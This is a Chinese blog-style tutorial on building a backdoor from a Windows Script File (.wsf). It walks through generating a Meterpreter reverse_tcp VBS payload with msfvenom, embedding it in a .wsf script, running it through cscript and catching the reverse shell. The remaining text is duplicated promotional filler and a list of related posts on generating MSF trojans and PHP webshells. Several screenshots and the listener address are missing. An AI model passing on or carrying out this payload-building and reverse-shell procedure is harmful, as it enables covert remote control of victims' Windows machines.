**

网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

**
首先了解wsf是啥语言,可参考文章如下:

https://www.cnblogs.com/vitrox/p/5137441.html
https://blog.csdn.net/leyvan/article/details/3746683
http://book.51cto.com/art/201111/300472.htm

wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路

1)学习.wsf脚本格式

2)msf生成vbs

  1. msf生成vbs插入.wsf脚本格式

4)尝试运行查看是否报错

5)反弹shell

开始制作脚本:

1) .wsf脚本格式

2) msf生成vbs

msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

复制

3) msf生成vbs插入.wsf脚本中

4)尝试运行无查看是否报错:

直接运行无报错

使用cscript.exe (WindowsScript Host引擎),运行无报错:

5)反弹shell

监听:

反弹:

知识补充:

网络安全成长路线图

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

d59b5f63c5e626f914.png)

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

msf 生成.wsf 木马相关推荐

  1. MSF生成一个木马与使用

    原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中. 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.16 ...

  2. MSF生成windows木马

    msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom ...

  3. vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

    一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...

  4. MSF生成木马及木马的简单使用

    0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...

  5. MSF(2)——各种木马的生成及简单的免杀

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 木马生成 免杀 php 免杀 Python 免杀 分析木马文件 编写免杀马 打包exe 前文链接 WAMP/DVWA/sql ...

  6. MSF生成木马渗透WIN7

    文章目录 1.生成木马 2.启动msfconsole 3.后门操作 3.1 文件(文件,目录等)操作 3.2 网络命令(net等)操作 3.3 系统命令(权限,用户,用户组等)操作 3.4 压缩工具( ...

  7. msf安卓手机木马实战要点整理

    Msf手机木马高级选项设置说明 Androidwakelock  阻止手机休眠以便处理耗时操作 AutoUnhookProcess  ? AutoVerifySession        自动验证删除 ...

  8. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  9. mysql定时木马_Mysql的语句生成后门木马的方法

    咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...

最新文章

  1. 应对618,京东到家订单系统高可用架构的迭代实战
  2. python的sklearn机器学习SVM中的NuSVC运行报错:ValueError: b'specified nu is infeasible'
  3. 年轮蛋糕JOI2014Final
  4. 单网卡Squid AS4 U5 设置
  5. leetcode45. 跳跃游戏 II
  6. 再提“鸿蒙”,任正非说这是为物联网而生;硅谷公司年薪报告出炉,谷歌年薪居榜首;苹果CEO库克接班人浮出水面,苹果高层或大换血?...
  7. ubuntu为python处理图片安装图片数据增强库imgaug
  8. java中有jar连接数据库 SqlHelper配置
  9. Linux SSHD服务安装与维护详解(二)——SSHD调优和fail2ban联动
  10. Interpreting and Disentangling Feature Components of Various Complexity from DNNS论文解读
  11. matlab exprnd函数,Matlab 用 exprnd 函数生成符合指数分布的随机数
  12. 极限分辨率是艾里斑的直径还是半径_小孔成像(二)——衍射,数值孔径和分辨率...
  13. 等级保护三级备案材料有哪些
  14. insightface 的学习与使用
  15. 详细解读行人重识别的k-reciprocal Encoding(k个相互近邻编码方法) re-ranking方法及其实现代码解读
  16. 机器学习sklearn-逻辑回归
  17. 半导体随机存储器(random access memory)
  18. 有两个空酒桶,分别能舀3斤和7斤酒,还有1个装满了10斤的酒桶,我要卖5斤酒给剑客,这该如何是好?
  19. 深度学习CPU版本环境搭建(从anaconda->pycharm->tensorflow)
  20. 深度学习 yolov5等结构图

热门文章

  1. 论校园网如何实现免认证
  2. 播客:个性化的新舞台 广告商和风投的新宠儿
  3. CentOS7安装iTop
  4. UnaryOperator示例
  5. uniapp 安卓端实时监听网络状态
  6. Qt使用AES128加密一段文字实例
  7. Neutron 消息回调系统
  8. 康耐视Visionpro-QuickBuild Tools 使用教程
  9. PowerDesigner连接oracle、PDMReader导出数据库字典
  10. java uint8array_uint8array和string的互转